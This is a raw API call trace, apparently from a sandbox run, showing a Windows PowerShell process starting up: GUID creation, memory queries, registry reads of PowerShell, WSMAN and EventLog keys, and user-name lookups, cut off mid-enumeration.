[0079.955] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x6221fb6b, Data2=0x2a6f, Data3=0x4947, Data4=([0]=0x85, [1]=0xc0, [2]=0xc6, [3]=0x12, [4]=0x5e, [5]=0xcf, [6]=0x83, [7]=0xa9))) returned 0x0
[0079.955] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x36675313, Data2=0xa7a6, Data3=0x46db, Data4=([0]=0x80, [1]=0x88, [2]=0xae, [3]=0x6, [4]=0x25, [5]=0x63, [6]=0x7f, [7]=0xa2))) returned 0x0
[0079.956] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x523aeef5, Data2=0x56b5, Data3=0x4d0a, Data4=([0]=0x8c, [1]=0x9e, [2]=0x82, [3]=0x57, [4]=0x47, [5]=0xfd, [6]=0x36, [7]=0xc0))) returned 0x0
[0079.957] VirtualQuery (in: lpAddress=0x10b980, lpBuffer=0x10c840, dwLength=0x30 | out: lpBuffer=0x10c840*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.957] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xd9356fa2, Data2=0xd76d, Data3=0x4ae4, Data4=([0]=0xb8, [1]=0x36, [2]=0x2e, [3]=0x73, [4]=0xb2, [5]=0xcc, [6]=0x2e, [7]=0xbd))) returned 0x0
[0079.957] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x6f740c6c, Data2=0xaea1, Data3=0x4de4, Data4=([0]=0x80, [1]=0x6f, [2]=0xf3, [3]=0x2a, [4]=0xcd, [5]=0x24, [6]=0xe6, [7]=0x8d))) returned 0x0
[0079.957] VirtualQuery (in: lpAddress=0x10b9f0, lpBuffer=0x10c8b0, dwLength=0x30 | out: lpBuffer=0x10c8b0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.957] VirtualQuery (in: lpAddress=0x10b9f0, lpBuffer=0x10c8b0, dwLength=0x30 | out: lpBuffer=0x10c8b0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.957] VirtualQuery (in: lpAddress=0x10b9f0, lpBuffer=0x10c8b0, dwLength=0x30 | out: lpBuffer=0x10c8b0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.957] VirtualQuery (in: lpAddress=0x10b9f0, lpBuffer=0x10c8b0, dwLength=0x30 | out: lpBuffer=0x10c8b0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.958] SetErrorMode (uMode=0x1) returned 0x1
[0079.958] SetErrorMode (uMode=0x1) returned 0x1
[0079.958] GetFileType (hFile=0x30c) returned 0x1
[0079.960] SetErrorMode (uMode=0x1) returned 0x1
[0079.960] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10ccc0 | out: lpFileInformation=0x10ccc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
[0079.960] SetErrorMode (uMode=0x1) returned 0x1
[0079.960] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cda8 | out: phkResult=0x10cda8*=0x30c) returned 0x0
[0079.960] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10cd2c, lpData=0x0, lpcbData=0x10cd28*=0x0 | out: lpType=0x10cd2c*=0x1, lpData=0x0, lpcbData=0x10cd28*=0x56) returned 0x0
[0079.960] CoTaskMemAlloc (cb=0x5a) returned 0x24d1a0
[0079.960] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ccfc, lpData=0x24d1a0, lpcbData=0x10ccf8*=0x56 | out: lpType=0x10ccfc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10ccf8*=0x56) returned 0x0
[0079.960] CoTaskMemFree (pv=0x24d1a0)
[0079.960] RegCloseKey (hKey=0x30c) returned 0x0
[0079.961] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xb75a1138, Data2=0xf636, Data3=0x4b1b, Data4=([0]=0x96, [1]=0xc9, [2]=0xe6, [3]=0x65, [4]=0xe7, [5]=0x97, [6]=0xf5, [7]=0xcd))) returned 0x0
[0079.961] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x35e9241e, Data2=0x8978, Data3=0x4e9b, Data4=([0]=0xaf, [1]=0xcb, [2]=0x1c, [3]=0xc1, [4]=0xa1, [5]=0x9b, [6]=0x25, [7]=0xd))) returned 0x0
[0079.961] SetErrorMode (uMode=0x1) returned 0x1
[0079.961] SetErrorMode (uMode=0x1) returned 0x1
[0079.961] GetFileType (hFile=0x30c) returned 0x1
[0079.963] SetErrorMode (uMode=0x1) returned 0x1
[0079.963] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10ccc0 | out: lpFileInformation=0x10ccc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
[0079.963] SetErrorMode (uMode=0x1) returned 0x1
[0079.963] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cda8 | out: phkResult=0x10cda8*=0x30c) returned 0x0
[0079.963] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10cd2c, lpData=0x0, lpcbData=0x10cd28*=0x0 | out: lpType=0x10cd2c*=0x1, lpData=0x0, lpcbData=0x10cd28*=0x56) returned 0x0
[0079.963] CoTaskMemAlloc (cb=0x5a) returned 0x24d1a0
[0079.963] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ccfc, lpData=0x24d1a0, lpcbData=0x10ccf8*=0x56 | out: lpType=0x10ccfc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10ccf8*=0x56) returned 0x0
[0079.963] CoTaskMemFree (pv=0x24d1a0)
[0079.963] RegCloseKey (hKey=0x30c) returned 0x0
[0079.964] VirtualQuery (in: lpAddress=0x10b840, lpBuffer=0x10c700, dwLength=0x30 | out: lpBuffer=0x10c700*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.964] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0x899e7dff, Data2=0xc8ad, Data3=0x4145, Data4=([0]=0xb3, [1]=0xb, [2]=0xe5, [3]=0x6e, [4]=0x2e, [5]=0x75, [6]=0x7f, [7]=0x7d))) returned 0x0
[0079.964] CoCreateGuid (in: pguid=0x10cfd0 | out: pguid=0x10cfd0*(Data1=0xe661198b, Data2=0x6a61, Data3=0x4b22, Data4=([0]=0xa6, [1]=0xe0, [2]=0x8c, [3]=0x31, [4]=0x54, [5]=0x4a, [6]=0x50, [7]=0xf2))) returned 0x0
[0080.083] CoTaskMemAlloc (cb=0x104) returned 0x229db0
[0080.083] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229db0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.083] CoTaskMemFree (pv=0x229db0)
[0080.083] CoTaskMemAlloc (cb=0x104) returned 0x229db0
[0080.083] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229db0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.083] CoTaskMemFree (pv=0x229db0)
[0080.083] CoTaskMemAlloc (cb=0x104) returned 0x229db0
[0080.083] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229db0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.083] CoTaskMemFree (pv=0x229db0)
[0080.083] CoTaskMemAlloc (cb=0x104) returned 0x229db0
[0080.083] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229db0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.083] CoTaskMemFree (pv=0x229db0)
[0080.302] CoTaskMemAlloc (cb=0x104) returned 0x229db0
[0080.302] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229db0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.302] CoTaskMemFree (pv=0x229db0)
[0080.309] CoTaskMemAlloc (cb=0x104) returned 0x229db0
[0080.309] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229db0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.309] CoTaskMemFree (pv=0x229db0)
[0080.309] CoTaskMemAlloc (cb=0x104) returned 0x229db0
[0080.309] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229db0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.310] CoTaskMemFree (pv=0x229db0)
[0080.317] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cfb8 | out: phkResult=0x10cfb8*=0x30c) returned 0x0
[0080.318] RegQueryInfoKeyW (in: hKey=0x30c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x10cebc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10ceb8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x10cebc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10ceb8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.318] CoTaskMemFree (pv=0x0)
[0080.318] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.318] RegEnumValueW (in: hKey=0x30c, dwIndex=0x0, lpValueName=0x1c3c90, lpcchValueName=0x10cf68, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x10cf68, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
[0080.318] CoTaskMemFree (pv=0x1c3c90)
[0080.318] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.318] RegEnumValueW (in: hKey=0x30c, dwIndex=0x1, lpValueName=0x1c3c90, lpcchValueName=0x10cf68, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x10cf68, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
[0080.319] CoTaskMemFree (pv=0x1c3c90)
[0080.319] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.319] RegEnumValueW (in: hKey=0x30c, dwIndex=0x2, lpValueName=0x1c3c90, lpcchValueName=0x10cf68, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x10cf68, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
[0080.319] CoTaskMemFree (pv=0x1c3c90)
[0080.319] RegQueryValueExW (in: hKey=0x30c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x10cf4c, lpData=0x0, lpcbData=0x10cf48*=0x0 | out: lpType=0x10cf4c*=0x1, lpData=0x0, lpcbData=0x10cf48*=0x8) returned 0x0
[0080.319] CoTaskMemAlloc (cb=0xc) returned 0x24cfb0
[0080.319] RegQueryValueExW (in: hKey=0x30c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x10cf1c, lpData=0x24cfb0, lpcbData=0x10cf18*=0x8 | out: lpType=0x10cf1c*=0x1, lpData="2.0", lpcbData=0x10cf18*=0x8) returned 0x0
[0080.319] CoTaskMemFree (pv=0x24cfb0)
[0080.529] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf08 | out: phkResult=0x10cf08*=0x310) returned 0x0
[0080.529] RegQueryInfoKeyW (in: hKey=0x310, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x10ce0c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10ce08, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x10ce0c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10ce08*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.529] CoTaskMemFree (pv=0x0)
[0080.529] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.529] RegEnumValueW (in: hKey=0x310, dwIndex=0x0, lpValueName=0x1c3c90, lpcchValueName=0x10ceb8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x10ceb8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
[0080.529] CoTaskMemFree (pv=0x1c3c90)
[0080.529] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.529] RegEnumValueW (in: hKey=0x310, dwIndex=0x1, lpValueName=0x1c3c90, lpcchValueName=0x10ceb8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x10ceb8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
[0080.529] CoTaskMemFree (pv=0x1c3c90)
[0080.529] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.530] RegEnumValueW (in: hKey=0x310, dwIndex=0x2, lpValueName=0x1c3c90, lpcchValueName=0x10ceb8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x10ceb8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
[0080.530] CoTaskMemFree (pv=0x1c3c90)
[0080.530] RegQueryValueExW (in: hKey=0x310, lpValueName="StackVersion", lpReserved=0x0, lpType=0x10ce9c, lpData=0x0, lpcbData=0x10ce98*=0x0 | out: lpType=0x10ce9c*=0x1, lpData=0x0, lpcbData=0x10ce98*=0x8) returned 0x0
[0080.530] CoTaskMemAlloc (cb=0xc) returned 0x24ce10
[0080.530] RegQueryValueExW (in: hKey=0x310, lpValueName="StackVersion", lpReserved=0x0, lpType=0x10ce6c, lpData=0x24ce10, lpcbData=0x10ce68*=0x8 | out: lpType=0x10ce6c*=0x1, lpData="2.0", lpcbData=0x10ce68*=0x8) returned 0x0
[0080.530] CoTaskMemFree (pv=0x24ce10)
[0080.531] CoTaskMemAlloc (cb=0x104) returned 0x229db0
[0080.531] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229db0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.531] CoTaskMemFree (pv=0x229db0)
[0080.557] CoTaskMemAlloc (cb=0x104) returned 0x229db0
[0080.557] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229db0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.557] CoTaskMemFree (pv=0x229db0)
[0080.560] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf38 | out: phkResult=0x10cf38*=0x324) returned 0x0
[0080.562] RegQueryInfoKeyW (in: hKey=0x324, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x10ceac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10cea8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x10ceac*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10cea8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.562] CoTaskMemFree (pv=0x0)
[0080.563] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.563] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x0, lpName=0x1c3c90, lpcchName=0x10cf38, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x10cf38, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.563] CoTaskMemFree (pv=0x1c3c90)
[0080.563] CoTaskMemFree (pv=0x0)
[0080.563] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.563] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x1, lpName=0x1c3c90, lpcchName=0x10cf38, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x10cf38, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.563] CoTaskMemFree (pv=0x1c3c90)
[0080.563] CoTaskMemFree (pv=0x0)
[0080.563] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.563] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x2, lpName=0x1c3c90, lpcchName=0x10cf38, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x10cf38, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.563] CoTaskMemFree (pv=0x1c3c90)
[0080.563] CoTaskMemFree (pv=0x0)
[0080.563] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.563] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x3, lpName=0x1c3c90, lpcchName=0x10cf38, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x10cf38, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.563] CoTaskMemFree (pv=0x1c3c90)
[0080.563] CoTaskMemFree (pv=0x0)
[0080.563] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.563] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x4, lpName=0x1c3c90, lpcchName=0x10cf38, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x10cf38, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.563] CoTaskMemFree (pv=0x1c3c90)
[0080.563] CoTaskMemFree (pv=0x0)
[0080.564] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.564] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x5, lpName=0x1c3c90, lpcchName=0x10cf38, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x10cf38, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.564] CoTaskMemFree (pv=0x1c3c90)
[0080.564] CoTaskMemFree (pv=0x0)
[0080.564] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.564] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x6, lpName=0x1c3c90, lpcchName=0x10cf38, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x10cf38, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.564] CoTaskMemFree (pv=0x1c3c90)
[0080.564] CoTaskMemFree (pv=0x0)
[0080.564] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.564] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x7, lpName=0x1c3c90, lpcchName=0x10cf38, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x10cf38, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.564] CoTaskMemFree (pv=0x1c3c90)
[0080.564] CoTaskMemFree (pv=0x0)
[0080.564] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.564] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x8, lpName=0x1c3c90, lpcchName=0x10cf38, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x10cf38, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.564] CoTaskMemFree (pv=0x1c3c90)
[0080.564] CoTaskMemFree (pv=0x0)
[0080.564] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf98 | out: phkResult=0x10cf98*=0x334) returned 0x0
[0080.564] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf98 | out: phkResult=0x10cf98*=0x0) returned 0x2
[0080.564] RegOpenKeyExW (in: hKey=0x324, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf98 | out: phkResult=0x10cf98*=0x338) returned 0x0
[0080.564] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf98 | out: phkResult=0x10cf98*=0x0) returned 0x2
[0080.564] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf98 | out: phkResult=0x10cf98*=0x33c) returned 0x0
[0080.564] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf98 | out: phkResult=0x10cf98*=0x0) returned 0x2
[0080.564] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf98 | out: phkResult=0x10cf98*=0x340) returned 0x0
[0080.564] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf98 | out: phkResult=0x10cf98*=0x0) returned 0x2
[0080.565] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf98 | out: phkResult=0x10cf98*=0x344) returned 0x0
[0080.565] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf98 | out: phkResult=0x10cf98*=0x0) returned 0x2
[0080.565] RegOpenKeyExW (in: hKey=0x324, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf98 | out: phkResult=0x10cf98*=0x348) returned 0x0
[0080.565] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf98 | out: phkResult=0x10cf98*=0x0) returned 0x2
[0080.565] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf98 | out: phkResult=0x10cf98*=0x0) returned 0x5
[0080.578] RegOpenKeyExW (in: hKey=0x324, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf98 | out: phkResult=0x10cf98*=0x34c) returned 0x0
[0080.578] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf98 | out: phkResult=0x10cf98*=0x0) returned 0x2
[0080.578] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf98 | out: phkResult=0x10cf98*=0x350) returned 0x0
[0080.578] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cf98 | out: phkResult=0x10cf98*=0x354) returned 0x0
[0080.578] RegCloseKey (hKey=0x354) returned 0x0
[0080.578] RegCloseKey (hKey=0x324) returned 0x0
[0080.578] RegCloseKey (hKey=0x350) returned 0x0
[0080.584] CoTaskMemAlloc (cb=0x804) returned 0x1b791440
[0080.585] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b791440, nSize=0x10d1a8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x10d1a8) returned 0x1
[0080.655] CoTaskMemFree (pv=0x1b791440)
[0080.657] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.657] GetUserNameW (in: lpBuffer=0x1c3c90, pcbBuffer=0x10d1e8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x10d1e8) returned 1
[0080.658] CoTaskMemFree (pv=0x1c3c90)
[0080.670] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x10cee8 | out: phkResult=0x10cee8*=0x358) returned 0x0
[0080.670] RegQueryInfoKeyW (in: hKey=0x358, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x10ce5c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10ce58, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x10ce5c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10ce58*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.670] CoTaskMemFree (pv=0x0)
[0080.670] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.670] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x0, lpName=0x1c3c90, lpcchName=0x10cee8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x10cee8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.670] CoTaskMemFree (pv=0x1c3c90)
[0080.670] CoTaskMemFree (pv=0x0)
[0080.670] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0080.670] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x1, lpName=0x1c3c90, lpcchName=0x10cee8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x10cee8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.670] CoTaskMemFree (pv=0x1c3c90)
[0080.670] CoTaskMemFree (pv=0x0)
[0080.670] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
